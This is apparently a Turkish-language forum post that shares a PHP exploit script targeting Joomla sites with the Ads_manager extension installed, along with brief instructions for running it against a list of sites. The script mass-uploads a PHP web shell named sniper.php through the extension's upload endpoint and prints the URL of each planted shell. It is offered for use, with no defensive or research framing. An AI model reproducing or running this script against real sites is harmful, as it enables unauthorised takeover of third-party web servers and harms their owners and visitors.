Bu priv exploit Ads_manager eklentisi kurulu joomla siteleri hedef alır kullanımı için cmd açıp php exploit.php list.txt diyeceğiz list.txt zaten eklentinin kurulu olduğu siteler exploit.php de dosyanın adı cmd de php dosyayı tam nasıl açıyorduk bilmiyorum perl ve python gibi oda activephp adlı yazılım felan isteyebilir tam bilen bi arkadaş varsa söylesin bende yararlaniyim 
herneyse hemen kodları paylaşayım
herneyse hemen kodları paylaşayım
Kod:
<?php
# Usage : php exploit.php list.txt
echo "\n _ _ \t";
echo "\n / \ __| |___ _ __ ___ __ _ _ __ __ _ __ _ ___ _ __ \t";
echo "\n / _ \ / _` / __| '_ ` _ \ / _` | '_ \ / _` |/ _` |/ _ \ '__| \t";
echo "\n / ___ \ (_| \__ \ | | | | | (_| | | | | (_| | (_| | __/ | \t";
echo "\n /_/ \_\__,_|___/_| |_| |_|\__,_|_| |_|\__,_|\__, |\___|_| \t";
echo "\n |___/ [ CODED BY M0R0CC4N SN!P3R ] \n";
echo "\n\n";
$listweb=@file_get_contents($argv[1]);
$exploded=explode("\n",$listweb);
foreach ($exploded as $explodedsites) {
$path = "$explodedsites/index.php?option=com_adsmanager&task=upload&tmpl=component";
$post = array(
"file" => "@sniper.jpg",
"name" => "sniper.php"
);
$ch = curl_init ("$path");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
$data;
echo "Target => $explodedsites \n";
echo "[+] Sent Payload \n";
$content=@file_get_contents($explodedsites);
if (eregi("sniper.php", $data))
{
echo "[+] Shell Uploaded Success : $explodedsites/tmp/plupload/sniper.php \n";
}
else
{
echo "[-] Not Vuln \n";
}
}
?>
